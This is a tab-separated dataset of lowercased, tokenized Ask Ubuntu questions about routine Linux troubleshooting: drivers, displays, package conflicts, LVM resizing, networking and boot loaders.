252116	how can i get my bookmarks shown in nemo quicklists automatically	how can i get my bookmarks , shown in nemo quicklists automatically . like nautilus can right now . as seen in the image below . when i create a bookmark in nautilus , it is automatically shown in nautilus quick-lists . how can i get that exact same feature for nemo ! ?
252119	error during ati propreitary driver install	i tried to install the latest ( 13.1 ) ati propreitary drivers , as mentioned here . but i 'm getting the following error when trying to create .deb packages for use . ... ... ... ... ... ... # refresh copyright file cat debian/copyright_stub_0 > debian/copyright cat usr/share/doc/fglrx/license.txt > > debian/copyright cat debian/copyright_stub_1 > > debian/copyright # steps that we ca n't easily represent in debhelper files or .in files yet # remove any libraries that may be caught by shell expansion find . -name libgle* | xargs rm -f find . -name libegl* | xargs rm -f dh_installdirs -pfglrx # install the qt libraries dh_install -pfglrx `` arch/x86_64/usr/share/ati/lib '' `` usr/share/ati '' cp : can not stat `debian/tmp/arch/x86_64/usr/share/ati/lib ' : no such file or directory dh_install : cp -a debian/tmp/arch/x86_64/usr/share/ati/lib debian/fglrx/usr/share/ati/ returned exit code 1 make : *** [ binary-arch ] error 2 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 [ error ] generate package - error generating package : ubuntu/quantal how can i fix this error ? i tried the open radeon driver , but the laptop was overheating to above 80 degrees c. i installed the propreitary drivers via the software sources window , and the system was running at moderate temperature , but then i could n't login to gnome 3 after the reboot , so installing the propreitary drivers properly would be really useful .
252122	setting up dante on ubuntu server 12.04	i 'm trying to set up and configure socks5 server that requires authentication . i 've got dante to run on ubuntu and set up configuration to be able to connect without authentication first : internal : eth0 port = 1080 external : eth0 method : username none user.privileged : root client pass { from : 0.0.0.0/0 to : 0.0.0.0/0 } pass { from : 0.0.0.0/0 to : 0.0.0.0/0 protocol : tcp udp } after this i 've started dante by /etc/init.d/danted start netstat -n -a shows : tcp 0 0 10.135.9.111:1080 0.0.0.0 : * listen however , i ca n't connect to it from the outside . what 's wrong ?
252123	kubuntu uses random minimize effects	i 'm using kubuntu 12.04 with kde 4.10 however this issue is also present on my other machines running stock kde from kubuntu 12.04 and 12.10 . i 'm using the nvidia currrent-updates driver . the problem is the minimize effect seems to be rather random . most of the times it will use the preferred and default way ( which is the `` slide to taskbar , while decreasing the overall window size ( a bit like windows 7 ) ) but sometimes it will use a `` zoom out '' effect which will make the window zoom out in the middle of the screen . another way to describe this effect will be `` the window is sucked into the desktop '' ) how do i make kde only use the first mentioned effect ? in kwin : desktop effects i have only enabled the option `` minimize effect '' which has no configuration options . i have n't done any configuration changes of the desktop effects at all . best regards : )
252125	looking to log memory usage and cpu usage every x interval on a box	i am looking to monitor memory and cpu usage on the box every minute or so . any recommended ways on doing this ?
252129	resolution and screens not detected properly	i 've installed ubuntu 12.04 on my laptop with integrated intel graphics ( intel i5 460m cpu ) . the screen resolution is set to 1024x768 and can only be changed to 800x600 , while my screen is 1366x768 . i have secondary nvidia graphics and optimus installed and working . there 's also a 1920x1080 display connected via hdmi which i 'd like to configure for extended desktop ( it 's mirrored now ) . disconnecting the external display does n't solve the problem . i 've tried generating new xorg.conf with xorg -configure but it failed with a following message : number of created screens does not match number of detected devices it still had dropped a file called xorg.conf.new in my home directory . i 've copied it to /etc/x11 , but it did n't help . ubuntu 12.10 did run in 1366x768 with mirrored displays , but it switched to 1024x768 instantly after login . some info : gronostaj @ gbuntu : ~ $ sudo xrandr [ sudo ] password for gronostaj : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0* 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 521mm x 293mm 1920x1080 60.0 + 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0* 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x480 59.9 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) jockey does n't detect any drivers that could be used , but it did on clean 12.04 install . after the first update there are no drivers available . do you guys have any idea how to get it working as it should ?
252130	acer aspire 5334 , poor graphics , no wireless or wired internet , no sound , after update to 12.10 could i get some help ?	i do n't have the terminal outputs but my wireless is atheros not broadcom . my system is i386 running quantum 12.10 . i have tried many different approaches but have n't found any specifically catered to my problems . if you have some ideas post em and i 'll be back with more info if you want/need it .
252132	can`t install ubuntu 12.10 from usb stick	have a laptop with x64 amd , 3 gig ram , win 7 . downloaded the desktop iso file 12.10 x64 from ubuntu website . also universal usb installer and unetbootin win . when i finished the first step = > load the iso file in universal usb installer to my usb stick and then restart with usb stick in the usbport , bios not find the usb media . i have changed the usb to boot as nr 1 , harddrive as nr 2 in bios . also tried with the 32 bit ubuntu verson and unetbootin but dosenâ´t work ? press f # 9 when boot and bootmenu comes up and only harddrive with win 7 is available to choose , usbstick dosent shows up . whats wrong ?
252138	dma : out of sw-iommu space	i started to get these errors in dmesg which grinds my system to a halt : [ 3429.303756 ] dma : out of sw-iommu space for 70 bytes at device 0000:02:00.0 [ 3429.358577 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.360040 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.405897 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.509070 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.561499 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.561938 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 [ 3429.610809 ] dma : out of sw-iommu space for 70 bytes at device 0000:02:00.0 [ 3429.611818 ] dma : out of sw-iommu space for 3860 bytes at device 0000:00:1a.0 i just started using hostapd to create a virtual infrastructure mode , and looked up the device id : # lshw|grep 0000:02:00.0 -a 5 -b 5 *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : mon.wlan3 version : 01 serial : 9c : b7:0d : a5:45:67 width : 64 bits clock : 33mhz sure enough wlan3 is my internal wifi , and mon.wlan3 is the dev created by hostapd . this is the hostapd.conf i was using at the time , it happened twice and each time i had to reboot to get the system back running right : interface=wlan3 driver=nl80211 ssid=matt hw_mode=g channel=1 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 # wpa=3 # wpa_passphrase= '' 888444111333 '' # wpa_key_mgmt=wpa-psk # wpa_pairwise=tkip # rsn_pairwise=ccmp # beacon_int=100 # dtim_period=2 # max_num_sta=32 # rts_threshold=2347 # fragm_threshold=2346 # wep_default_key=1 # wep_key1= '' zzzzz '' # wep_key_len_broadcast= '' 5 '' # wep_key_len_unicast= '' 5 '' # wep_rekey_period=300 logger_stdout=-1 logger_stdout_level=0 any ideas ? and here is the other device : # lshw|grep 0000:00:1a.0 -b 5 -a 5 *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 thanks
252139	google chrome starting up slow	whenever i try to open chrome for the first time after booting , it takes about 8-10 seconds longer than it does for windows . is this the case for everyone ? is there a way to fix it ? i know it is not that much of an important problem but it bothers to wait that long while the process is instant on windows 7 .
252140	how do i install and use flashcache/bcache to cache hdd to ssd ?	i want to know if there is anyone who has tried installing and running their kernel built with flashcache or bcache for ssd caching ? how did you manage to do it ?
252143	how do i set up multiple printing defaults for one printer ?	i have a printer capable of printing high res photos on photo paper , and duplex documents on plain a4 . i have set the printer up twice ( i.e . two separate printers pointing to the same uri ) using the cups interface at http : //localhost:631 , once called documents , once called photos . for each of these instances i have set up the appropriate defaults ( media type , size , print quality , duplex ... ) . cups seems to remember these fine but applications ( e.g . libreoffice , eog , firefox ... under gnome shell fwiw ) seem to have some weird other default that bears no resemblance to either the defaults i set up , nor the last settings i used with any particular application . it 's a problem because there are so many settings to change that it adds a couple of minutes to each and every print job . inevitably i forget one or two and end up having to reprint the job . seems there must be somewhere that these defaults get stored ? anyone shed any light on it ?
252145	how can i conditionally change the nautilus background color ?	i would like to have the nautilus background color different if the current folder is being managed by git ( i.e. , if there is a .git directory in it ) . any ideas how to do that ? ideal solution would work for all nautilus views ( list view & compact view , not just icon view ) . i 've looked at `` gnome color chooser '' and at the `` window rules '' module of ccsm , to no avail . i 'm running 10.04 , gnome2 , ccsm .
252149	ubuntu on nexus 7 and xbmc login	i tried to install xbmc on the nexus 7 but when i logged out of ubuntu and into xbmc the screen went blank with only a cursor visible . no problem , i thought , i will just reboot the nexus 7 but i have auto-login setup so it just tries to boot into xbmc again . i 'm now stuck , unable to boot into ubuntu . i presumed my only way out idf to reinstall , this time without auto login .
252153	ca n't start , stop , or interface with ssh service	having really bizarre behavior with ssh . i have the ssh-server running fine , configured ufw ( firewall ) fine as well . however , it seems i ca n't manage ssh as a service or through /etc/init.d/ssh . i re-installed openssh-server specifically to ensure my minor configuration tweaks to /etc/ssh/sshd_config were not the problem . ubuntu : ~/ $ sudo /etc/init.d/ssh status rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service ssh status since the script you are attempting to invoke has been converted to an upstart job , you may also use the status ( 8 ) utility , e.g . status ssh ssh stop/waiting and ubuntu : ~/ $ sudo service ssh status ssh stop/waiting but i can ssh fine ( either from ubuntu [ localhost ] or othercomputer [ remotely ] , presume the comp 's name is ubuntu ) othercomputer : ~/ $ ssh me @ ubuntu me @ ubuntu 's password : me @ ubuntu : ~/ $ very frustrating , unsure what the problem is . i 'm running gnome-keyring to manage my ssh-agent and keys , but this should n't interfere with ssh-server as a service .
252154	( ubuntu 12.10 ) ipod touch will not connect	i 'm having problems connecting my ipod touch ( 2g , running firmware 4.2.1 ) to ubuntu 12.10 . whenever i connect it via usb , i get the error message `` unable to connect . '' nothing on a lockdown error . i 've tried opening rhythmbox , amarok , and gtkpod with the ipod connected , but the device is not showing up at all . i 've downloaded the latest libimobiledevice and ifuse , but nothing seems to be working . i did try banshee . while the ipod is showing up , adding music gives me the error message : `` the mp3 format is not supported by the device , and no converter was found to convert it . '' strangely , looking at its stats : it says there are 6.8 gbs of `` other '' stuff and 6.3 gbs of free space ( which is odd because my ipod is only 8 gbs ) . i 've tried `` idevicepair unpair '' in the terminal , but i get the error : `` device e730d926557aae2209069e01954c65e3e8444f87 is not paired with this host . '' when i tried `` ideviceinfo '' , i get : `` gnutls error : a tls packet with unexpected length was received . '' i know it 's my ipod being problematic because i 've successfully been able to connect my girlfriend 's ipod nano . this is also a new laptop . my device worked on my previous laptop ( running lubuntu 12.04 before it died ) , so i know there 's still hope . if it can be helped , any assistance would be appreciated . otherwise , i may abandon apple altogether and use something else . thank you very much for your time .
252159	how can i upgrade from 10.10 to a newer version ?	i am still using 10.10 because i have had no reason to upgrade . at this point , i need some of the newer packages so i need to upgrade . i tried upgrading to 11.04 ( the only version that update manager gives me ... ) and it fails with this : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages.gz 404 not found , e : some index files failed to download , they have been ignored , or old ones used instead . please help me .
252163	how to monitor usb webcam bandwidth usage ?	i would like to find out the amount of bandwidth my usb webcam occupies while i 'm using it . i would prefer a command line solution .
252165	nautilus not working	the `` open a new window '' selection in nautilus stopped working today . i closed all my windows and when i tried to restart nautilus by clicking on the folder icon , it flashed as if it was trying to start up and then just quit again . does anyone know what caused this bug and how to fix it ?
252166	ubuntu is n't loading xorg.conf	i 'm running ubuntu 12.10 on my macbook pro , and i 've been using synclient to get the trackpad settings how i want them . i created an xorg.conf in /etc/x11 to make the settings permanent : section `` inputdevice '' identifier `` synaptics touchpad '' driver `` synaptics '' option `` sendcoreevents '' `` true '' option `` device '' `` /dev/psaux '' option `` protocol '' `` auto-dev '' option `` horizedgescroll '' `` 1 '' option `` minspeed '' `` 0.80 '' option `` maxspeed '' `` 1.10 '' option `` accelfactor '' `` 0.040 '' option `` edgemotionminspeed '' `` 200 '' option `` edgemotionmaxspeed '' `` 200 '' option `` updownscrolling '' `` 1 '' option `` shmconfig '' `` on '' option `` clickfinger3 '' `` 2 '' option `` tapbutton3 '' `` 2 '' endsection the problem is when i log out and log back in , my trackpad is back to the default sensitivity and settings . it does n't seem to be loading the settings i have in xorg.conf .
252167	ca n't access internal drive	new to ubuntu ( just 5 hours ) and these forums , so hello : ) here 's a summary of what happened . had windows xp installed this morning , thought i 'd give ubuntu a whirl since i was planning on using it on my just ordered odroid u2 , installed it through usb ( copied the important data on there to one of my three partitions , formatted it and installed ubuntu through that ) & decided to replace windows xp with ubuntu during installation because of random issues i was having with it . now i 'm having trouble accessing my drive . i can see my drive under computer but it says 'unable to mount location ' sorry if this is a really noob question , but its 2am here and i need my data in a few hours . i 've been searching for quite a bit now . downloaded gparted , tried mounting it through the terminal , and a couple other things . edit : running 12.10 btw
252168	can i install `libssl-dev : i386` on x86_64 system without losing important packages ?	on my x86_64 12.10 system , when i try to apt-get install libssl-dev : i386 apt wants to remove a bunch of things : the following packages will be removed : build-essential dkms g++ g++-multilib gcc gcc-multilib hardening-wrapper nvidia-current the following new packages will be installed : libc6-dev : i386 libssl-dev : i386 linux-libc-dev : i386 zlib1g-dev : i386 why does this happen ? how can i install libssl-dev : i386 without losing gcc ? i noticed that libssl-dev and libssl-dev : i386 have no `` multiarch '' field reported by apt-cache show , which i think means they can not coexist . ( https : //wiki.ubuntu.com/multiarchspec )
252171	can not download ubuntu using the windows installer	i 've tried three times to install ubuntu using windows installer . the first time it hung up in wubi . second time said it would take 6h 10 min . began running then disappeared after 30 minutes . third time it hung up with 5 min 10 sec displayed . any ideas ? i 'd like to try it .
252176	where to install bootloader when installing a second linux os ?	i want to try bodhi linux ( which is very close to ubuntu ) beside the already installed lubuntu quantual ( which was in a dual boot with winxp ) . so , i want a 3-boot : to chose between these three at boot . i have shrinked windows partition , created a 7 gb new one and want to put bodhi there . but did n't took the time to get all the info . where to put the bootloader ? i have set it to the same partition where i set bodhi to be installed . it is called /dev/sda4 and is on the same partition table with all the others . but during install it says that setting bootloader there is impossible and i have several options : change location of bootloader , continue without a bootloader and abort installation . what to do ? continuing without bootloader would keep the old lubuntu bootloader and i 'll have the 3-boot desired option in grub or what ? should i follow this answer and others that recommend to put bootloader in /dev/sda or is that just for dual boot ?
252178	how do i make the cuda 5.0 samples ?	i 'm in much the same boat as peterdc , who asked : how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? i 've installed the toolkit & the samples , but can not run make in the samples directory . when i try , i get : make [ 1 ] : entering directory `/usr/local/cuda-5.0/samples/0_simple/simplevoteintrinsics' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/usr/local/cuda-5.0/samples/0_simple/simplevoteintrinsics' make [ 1 ] : entering directory `/usr/local/cuda-5.0/samples/0_simple/simplempi' makefile:79 : *** mpi not found , not building simplempi.. stop . make [ 1 ] : leaving directory `/usr/local/cuda-5.0/samples/0_simple/simplempi' make : *** [ 0_simple/simplempi/makefile.ph_build ] error 2 does this mean i need to edit the makefile ? is this something i 'm doing wrong , or nvidia ?
252179	how to inspect outgoing http requests of a single application ?	my application is sending http requests to some server and i want to see the actual data that it is sending out . some specifics i would like to see : request method ( get/post/put , etc . ) content-type body what is the best and simple way to accomplish this ?
252184	ubuntu 12.04 booting suddenly with low screen brightness	i have no remembrance of having done anything but now my ubuntu 12.04 always boots with very low screen brightness . i can then adjust it with fn+pos1 . i have a lenovo x220 . neither xbacklight nor any setting in the system settings has any effect . i did read some recommendations about complicated python scripts . but why ? i did not change anything ! why is ubuntu broken ?
252187	terminator does not use specified background color for focused terminal titlebar	one of my favorite terminator features is how the focused window had a red titlebar . this makes it very easy to see which pane is active . however , i recently switched to a dark gtk2 theme ( i 'm running lubuntu ) and now all titlebars are permanently black . i 've tried tweaking the following setting ( it still shows red ) , with no effect : right click terminator > preferences > global tab > titlebar section > focused terminal background the `` font colour '' ( i.e . foreground ) and other settings work fine . any ideas ?
252191	how do i remove full name from owner column within file manager ?	within the file manager ( nautilus ) , you can customize it a bit through edit - > preferences . i set default view to list view and added some additional default columns . adding the owner column displays the machine username and full name of the user ( given on install ) . like this : name | size | group | owner | permissions file.txt | 1.0 kb | john | john - john doe | -rw-r -- r -- how do i remove the full name ? so it displays like this : name | size | group | owner | permissions file.txt | 1.0 kb | john | john | -rw-r -- r -- see how it says john - john doe ?
252193	who is mark shuttleworth , and how is he related to ubuntu ?	i am going to introduce ubuntu to some new users ( students in this case ) . usually , i talk about the history of ubuntu , how ubuntu started , who has built ubuntu in the past , and who decides the road ubuntu takes . of course , you ca n't talk about the history of ubuntu without mentioning mark shuttleworth . i would quite like to have a question on ask ubuntu to point new users to , so this is it ! who is mark shuttleworth , and how is he related to ubuntu ?
252204	how to shrink ubuntu lvm logical and physical volumes ?	i have installed ubuntu 12.10 as the only os on my system . i told ubuntu to overwrite everything as i was in a hurry , hence i only have the two partitions ubuntu creates , the boot partition of a couple a hundred mb , and then everything else . the main partition is about 600gb , i wish to resize this to 450gb , so i can install windows 8 as a dual boot . the issue is that i can not work out how to shrink the partition , normally it 's fine from the gparted ( gparted-live-0.14.1-6-i486.iso ) live iso , simply resize and you are good to go . but this time ubuntu has been installed with lvm . so , the ubuntu partition has a lock icon next to it . this prevents me from doing anything , i can select the partition , and there is an option for `` deactivate '' which if i am correct i believe is deactivating swap ? if i do that i can manipulate the partition . i am asking here if this is the correct thing to do before i bust my system . boot from the live gparted iso . select the ubuntu partition . `` deactivate '' the partition . resize the partition . `` activate '' the partition . apply . profit ? ? ? is my thinking correct ? edit # 1 so , after some extended chat i came down to this command sudo lvresize -- verbose -- resizefs -l -150g /dev/ubuntu/root which successfully shrunk the logical partition . but now i have the hard part . now i need to shrink the physical partition down so i can create a new physical partition with the space to install windows 8 . so i thought i could run pvresize -- setphysicalvolumesize { any size here } /dev/sda5 but i get back : /dev/sda5 : can not resize to xxxxx extents as later ones are allocated . which i believe is due to the swap due to this image : , so what 's my next step ? $ : lvdisplay -- - logical volume -- - lv path /dev/ubuntu/root lv name root vg name ubuntu lv uuid g7z3da-xska-8qpo-y5od-aivo-d8l1-22s6do lv write access read/write lv creation host , time ubuntu , 2013-01-29 22:06:02 +1300 lv status available # open 1 lv size 540.42 gib current le 138348 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv path /dev/ubuntu/swap_1 lv name swap_1 vg name ubuntu lv uuid 14qpry-h5jl-dtaq-cvle-k7bz-95rm-y46zos lv write access read/write lv creation host , time ubuntu , 2013-01-29 22:06:04 +1300 lv status available # open 2 lv size 7.97 gib current le 2041 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 additional information before edit # 1 note that the above shot is taken from the gparted version in the ubuntu repositories , not the latest version matthew @ play : ~ $ sudo fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c5bec device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1465147391 732322817 5 extended /dev/sda5 501760 1465147391 732322816 8e linux lvm disk /dev/mapper/ubuntu-root : 741.3 gb , 741334843392 bytes 255 heads , 63 sectors/track , 90128 cylinders , total 1447919616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 8560 mb , 8560574464 bytes 255 heads , 63 sectors/track , 1040 cylinders , total 16719872 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table matthew @ play : ~ $ sudo lvs lv vg attr lsize pool origin data % move log copy % convert root ubuntu -wi-ao -- 690.42g swap_1 ubuntu -wi-ao -- 7.97g matthew @ play : ~ $ sudo vgs vg # pv # lv # sn attr vsize vfree ubuntu 1 2 0 wz -- n- 698.39g 0 matthew @ play : ~ $ sudo pvs pv vg fmt attr psize pfree /dev/sda5 ubuntu lvm2 a -- 698.39g 0
252206	headphones and ubuntu 12.04 ( again )	as the title says . the description is classical : the internal speaker works but plugging in headphones makes it go silent . i did try to install dkms but it still does n't work . lspci | grep -i audio 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) and cat /proc/asound/card0/codec* | grep codec codec : realtek alc269vc codec : intel pantherpoint hdmi i sort of suspect it has something to do with setting the options in analog-output-headphones.conf or maybe a kernel update from today because yesterday the headphones were working : ( edit : following markpaskal 's suggestion i get this ( when the headphones are plugged in ) :
252210	is there a program that bans me from using a program for a certain amount of time ?	so school just restarted and i 'm crazy addicted to league of legend . is there anyway i can block myself from running it for like 1-2 days . i 'm looking for a program . i believe there is one like this for macs , but ai n't sure .
252215	network not working in ubuntu 10.04 lts	i have a motherboard with an atheros r8161 network interface card , running on ubuntu 10.04 lts 64bit with 3.2.0-030200-generic kernel . i 've built and installed the alx drivers from linuxfoundation.com . after installation , the nic shows up at eth2 according to ifconfig . i 've then also included the following lines in /etc/network to configure the interface auto eth2 iface eth2 inet dhcp however , even after these steps , i 'm still getting a `` addrconf ( netdev_up ) : eth2 : link is not ready '' in dmesg . additionally , in dmesg , udev renamed eth0 to eth2 . my router detects a link with a lit port led when the nic is connected to my router though , but i ca n't ping it . i 've also tried installing a really old pci nic and it got detected as eth3 upon bootup without any intervention , but i still ca n't ping the router . does anyone know how i might be able to fix this ? thanks .
252216	problem in libassimp-dev is preventing me using apt-get	i have a package conflict . it seems like no matter what i do i can not remove the offending package . apt-get acts like it wont actually remove a package until all dependencies are resolved . but i ca n't resolve dependencies because of the conflict . john @ john-ga-880gma-usb3 : ~ $ sudo apt-get -f purge assimp-dev reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ros-electric-assimp : depends : assimp-dev but it is not going to be installed ros-fuerte-robot-model : depends : libassimp-dev but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i try apt-get -f install and receive the error : sudo apt-get -f installreading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libassimp-dev the following new packages will be installed : libassimp-dev 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 6 not fully installed or removed . need to get 0 b/88.8 kb of archives . after this operation , 470 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 358595 files and directories currently installed . ) unpacking libassimp-dev ( from ... /libassimp-dev_2.0.863+dfsg-2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libassimp-dev_2.0.863+dfsg-2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/assimp/aianim.h ' , which is also in package assimp-dev 2.0.0.7-ubuntu1~oneiric1 errors were encountered while processing : /var/cache/apt/archives/libassimp-dev_2.0.863+dfsg-2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
252218	can i install ubuntu without installation media ?	i was curious what the best way to install ubuntu would be in my current situation . i have second hdd , completely clean . i want to install ubuntu but i do n't have a disk to burn to or a usb flash drive to put it on . any ideas or thoughts ?
252223	multiple boot windows 8 and ubuntu how to remove ?	i have a windows 8 and ubuntu 12 installed in my laptop but recently i formatted my laptop and re install windows and because i want a clean installation of my os i erased and formatted the drive c again and continued installing windows . after the installation done and the laptop booted up there is this option again which one i would like to boot ? so there is the windows 8 and the ubuntu again ? if i choose the ubuntu ofcourse there is nothing to boot up since i have erased the system by formatting the drive c. so , i thought by reinstalling the ubuntu os again will solve the problem since it will overwrite whatever is there . but it became worst , there are 3 os now ... windows 8 , ubuntu volume 1 , ubuntu volume 2 . now i am confused . i dont want to mess up again with my system.. i dont want to remove the ubuntu i installed i just dont like seeing the other one in there since the first ubuntu os that am trying to get rid does n't work anyway.. if anybody could help me on regarding this matter it will be a big help for me.. by the way , i installed ubuntu using wubi..
252225	print file was not accepted	i have installed and configured cups and samba on ubuntu 12.04 server for printing but when my windows clients send print job it stops in print queue and says that `` print file was not accepted '' any idea please ?
252227	startup problem : the disk drive /dev/mapper/cryptswap1 is not ready yet or not present ( 12.10 )	hi this message is appearing during start up , i 'm a bit of a linux noob and have no idea how to remedy this or what it even means . i also realise this is almost an exact replica of a question that has already been asked , however it has not been answered and i could not possibly describe the problem i 'm having any more accurately than this . if i just leave it it loads after a bit but once its done loading i get several pop ups asking if i want to send bug reports , is this related at all ? where do i start here guys ? any help would be greatly appreciated ! !
252228	pxe boot of ubuntu server 12.04 stops at grub-pc config	i am attempting to do unattended installation of ubuntu from pxe server . everything seems to be working fine until it gets to `` grub-pc '' configuration that require confirmation that i want to continue without installing boot manager . i can not find a way to suppress that menu or preseed choice in any way .
252229	how can i turn sticky edges off when it is already said to be disabled ?	i went into displays and made sure `` sticky edges '' was set to off . however , it acts as though it is still on ! where might this setting be hidden ? might there be a way to force it to turn off ? it 's extremely annoying , as my cursor sticks whenever i move from it from one screen to the next ! i have two monitors , and a geforce gtx 260 video card .
252230	dwarf fortress ( 34.11 ) does not run , no error message	when i try to run dwarf fortress , nothing happens . ubutnu 12.10 running on macbook 4,1 . when i try to run df on terminal , the terminal window pops open for a fraction of a second and then disappears , with no error message . i see someone else had a similar problem but got an error message . what might i be missing here ? how to diagnose and fix ? thanks much .
252231	cant install yaml-cpp because it conflicts with yaml-cpp ?	it appears that no yaml-cpp is installed sudo apt-get remove yaml-cpp package yaml-cpp is not installed , so not removed but when i try to install yaml-cpp i can not because apt-get all of a sudden remembers an old version of yaml-cpp that now conflicts . sudo apt-get install yaml-cpp the following new packages will be installed : yaml-cpp 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 205 kb of archives . after this operation , 577 kb of additional disk space will be used . get:1 http : //packages.ros.org/ros/ubuntu/ precise/main yaml-cpp i386 0.2.7-5precise-20120502-0513-+0000 [ 205 kb ] fetched 205 kb in 0s ( 237 kb/s ) ( reading database ... 342813 files and directories currently installed . ) unpacking yaml-cpp ( from ... /yaml-cpp_0.2.7-5precise-20120502-0513-+0000_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/yaml-cpp_0.2.7-5precise-20120502-0513-+0000_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/yaml-cpp/emitter.h ' , which is also in package yaml-cpp0.2.6-dev 0.2.6-4~oneiric dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/yaml-cpp_0.2.7-5precise-20120502-0513-+0000_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
252234	external monitor sideways with acer netbook . 12.10 new install	i was running ubuntu 11-point-something ok but shut the computer off while it was updating and trashed something . i downloaded the image file for 12.10 and installed it . when i hook up an hp 20 '' monitor though , its display is tipped sideways . if i set the resolution low enough with 'system settings > > displays ' it will work ok , but at high resolutions my only options are rotate clockwise and rotate counter clockwise , no normal . it does seem to know what the monitor is ( ie . that is it an hp and the resolutions it lists seem reasonable . when i check `` system settings > > details > > graphics '' it says driver unknown . from lshw : *-display:0 description : vga compatible controller product : atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory:98180000-981fffff ioport:60c0 ( size=8 ) memory:80000000-8fffffff memory:98000000-980fffff *-display:1 unclaimed description : display controller product : atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory:98100000-9817ffff
252237	how do i change what filetypes ubuntu one ignores on a mac ( osx ) ?	i understand how to add files to the syncdaemon.conf file in my ubuntu system going to /etc/xdg/ubuntuone/syncdaemon.conf and adding python strings to the ignore.default list . it worked great . i use ubuntu one on my mac os x 10.8 and it sync 's great , but i dont know where to update the syncdaemon.conf in order to make skip the same files as i did on my ubuntu machine . in the ubuntu\ one.app there exist about 15 different syncdaemon.conf files . which one do i change ? is it that simple here ?
252242	cloud vs virtualization vs saas - preparing my 1st install	i 'm thinking about taking a stab at ubuntu-one for cloud and/or virtualization purposes and for my first time although i have distro-hopped linux desktop for a few years and worked somewhat with red hat . just curious when you say `` cloud '' , will i need to set up a physical server and use acting thin client pcs on my home network working as a cloud storage solution or on-demand software ? or is this more of a all-in-one virtual box type solution ? when people say things like cloud , virtualization and saas/on-demand software , i always wonder what precisely is their definition ? i know it is somewhat of a noob question and maybe ubuntu-one can do all of the above . perhaps directing me to a faq area where this is more thoroughly covered ?
